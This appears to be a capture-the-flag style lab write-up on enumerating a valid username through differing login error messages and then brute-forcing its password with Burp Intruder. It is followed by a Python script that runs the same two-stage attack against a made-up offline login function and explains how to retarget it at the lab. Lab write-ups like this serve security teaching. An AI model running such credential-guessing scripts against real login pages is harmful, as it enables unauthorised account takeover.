long time no see
This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:
To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
- Open the web page using the browser included in Burp Suite, try a login, and find the corresponding HTTP request in the Proxy history. In this challenge, the target is POST /login.

- Select the request and send it to Intruder with Ctrl+I (or right-click it and choose “Send to Intruder”).

- (“Positions” tab) Choose one of the four attack types:
  - One payload set, one or more payload positions:
    - Sniper: takes each payload in turn and puts it into one position at a time, while the other positions keep their base value; then moves on to the next position. Requests sent = payloads × positions.
    - Battering Ram: puts the same payload into all positions at once. Requests sent = payloads.
  - Multiple payload sets, one set per payload position:
    - Pitchfork: walks through all sets in lockstep (first payload of each set together, then the second of each, and so on), stopping when the shortest set runs out.
    - Cluster Bomb: tries every combination of payloads across the sets. Requests sent = product of the set sizes, so this grows quickly.
  For this lab, Sniper with a single position is all we need.
- (“Positions” tab) Mark the payload position in the base request by selecting the value and clicking “Add §”. In this challenge we are brute-forcing the username first, so mark only the username value and leave the password as a fixed dummy value.

- (“Payloads” tab) Paste the username wordlist as the payload list (payload type “Simple list”).

- (“Settings” tab; “Options” in older versions) To pull extra data out of each response, use “Grep - Extract”; to simply flag responses that contain a string, use “Grep - Match”. In this challenge we are guessing that the “Invalid username” message will change to something else (a password error, for example) when the username is right, so add “Invalid username” as a Grep - Match expression, and keep an eye on the Length column too, since a different message usually means a different response size.

- Start the attack! A new window shows each request as it is sent; sort by the Grep column or the Length column and one username stands out with a different response. And… yeah, we find something different. (Burp Community Edition throttles Intruder, so a long wordlist takes a while.)

This covers the basic usage of Burp Intruder. Now that we know a valid username, repeat the attack with that username fixed in the base request and the § markers on the password, using the password wordlist as the payload. This time the correct guess is the one that comes back with a redirect instead of an error message. Log in with it and open the account page to solve the lab!
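The same two-stage attack as a script, as an added example that is not part of the original post or of the lab. The fake_login function, the credentials inside it and the two short wordlists are constructed here so that the script runs offline; the assumption that a successful login answers with a 302 redirect is also just the constructed server's behaviour. The four attack types are written out as payload generators so the request counts above can be checked, and the enumeration step picks the username whose response differs from the majority rather than matching a fixed string, which also works when you do not know the error message in advance.

```python
import itertools
from collections import Counter

# ---- Constructed stand-in for the lab's POST /login (not the real lab) ----
# The leak the lab is built on: a wrong username and a wrong password produce
# different error messages. The credentials below are made up.
VALID_USERNAME = "carlos"   # constructed
VALID_PASSWORD = "monkey"   # constructed


def fake_login(username, password):
    """Return (status_code, body) like a login handler would.
    Success is assumed to be a 302 redirect to the account page."""
    if username != VALID_USERNAME:
        return 200, "<p class=is-warning>Invalid username</p>"
    if password != VALID_PASSWORD:
        return 200, "<p class=is-warning>Incorrect password</p>"
    return 302, ""


# ---- The four Intruder attack types as payload generators ----
# `base` holds the base request's value for each marked position, in order.

def sniper(base, payloads):
    """One payload set: each payload goes into one position at a time while
    the other positions keep their base value (payloads x positions requests)."""
    for i in range(len(base)):
        for p in payloads:
            yield tuple(p if j == i else v for j, v in enumerate(base))


def battering_ram(base, payloads):
    """One payload set: the same payload is placed in every position at once."""
    for p in payloads:
        yield tuple(p for _ in base)


def pitchfork(payload_sets):
    """One set per position, advanced in lockstep; stops at the shortest set."""
    return zip(*payload_sets)


def cluster_bomb(payload_sets):
    """One set per position, every combination (Cartesian product)."""
    return itertools.product(*payload_sets)


# ---- Username enumeration, then password brute force ----

def enumerate_usernames(login, usernames, dummy_password="x"):
    """Sniper over the username position with a fixed dummy password.
    The valid username is the one whose response body differs from the
    majority; Intruder's Grep - Match / Length columns show the same outlier."""
    responses = {u: login(u, dummy_password) for u in usernames}
    bodies = Counter(body for _, body in responses.values())
    baseline = bodies.most_common(1)[0][0]
    return [u for u, (_, body) in responses.items() if body != baseline]


def brute_force_password(login, username, passwords):
    """Sniper over the password position; success is the redirect,
    not the absence of one particular error string."""
    for p in passwords:
        status, _ = login(username, p)
        if status == 302:
            return p
    return None


USERNAMES = ["admin", "root", "guest", "carlos", "test"]           # constructed wordlist
PASSWORDS = ["123456", "password", "qwerty", "monkey", "letmein"]  # constructed wordlist


def attack(login=fake_login, usernames=USERNAMES, passwords=PASSWORDS):
    """Run both stages and return {username: password} for every hit."""
    found = {}
    for user in enumerate_usernames(login, usernames):
        pw = brute_force_password(login, user, passwords)
        if pw is not None:
            found[user] = pw
    return found


if __name__ == "__main__":
    # Request counts for two positions and three payloads per set, showing
    # why Cluster Bomb is the expensive one.
    base = ("user", "pass")
    print("sniper:", len(list(sniper(base, ["a", "b", "c"]))))                      # 6
    print("battering ram:", len(list(battering_ram(base, ["a", "b", "c"]))))        # 3
    print("pitchfork:", len(list(pitchfork([["a", "b", "c"], ["1", "2", "3"]]))))   # 3
    print("cluster bomb:", len(list(cluster_bomb([["a", "b", "c"], ["1", "2", "3"]]))))  # 9
    print("credentials:", attack())   # {'carlos': 'monkey'}
```

To point this at the real lab, replace fake_login with a function that POSTs the two fields to the lab's /login with redirects disabled and returns the status code and body; everything else stays the same. Note that the majority-vs-outlier check only works when most of the wordlist is wrong, which is exactly the situation during enumeration.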